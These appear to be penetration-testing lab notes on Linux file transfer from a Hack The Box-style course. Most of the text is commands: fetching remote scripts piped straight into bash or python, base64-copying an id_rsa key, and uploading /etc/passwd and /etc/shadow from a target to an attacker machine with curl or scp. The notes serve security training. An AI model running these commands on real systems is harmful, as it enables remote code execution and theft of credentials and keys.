Linux

Download OPS

Base64 Encode/Decode:

1. md5sum id_rsa
2. cat id_rsa | base64 -w 0;echo
3. echo <base64 string> | base64 -d > somefile
4. md5sum somefile

wget, CURL

Fileless using cURL - curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash Fileless using wget - wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Download with BASH:

• exec 3<>/dev/tcp/10.10.10.32/80 - Connect to the target webserver
• echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 - HTTP GET Requests
• cat <&3 - Print the response

SSH Download

• Downloading from a remote host
• sudo systemctl enable ssh
• sudo systemctl start ssh
• netstat -lnpt
• scp username@192.168.49.128:/root/myroot.txt .
  • Create a new user for ssh file copy instead of the primary users

---

Upload OPS:

• for binary exploitation and packet capture analysis, we must upload files from our target to our PWNBOX.

Python Uploadserver

PWNBOX 1. sudo python3 -m pip install --user uploadserver - Start a Web server 2. openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' - Create a self signed certificate 1. The webserver should not host the certificate 2. Create a new dir to host the file for our webserver 3. mkdir https && cd https 4. sudo python3 -m uploadserver 443 --server-certificate ~/server.pem TARGET MACHINE: 5. curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Language WebServers

• python3 -m http.server
• python2.7 -m SimpleHTTPServer
• php -S 0.0.0.0:8888
• ruby -run -ehttpd . -p8000

SCP Upload:

• Outbound connections to SSH (PORT 22) allowed
• scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
  • copy /etc/passwd from local to remote on htb-student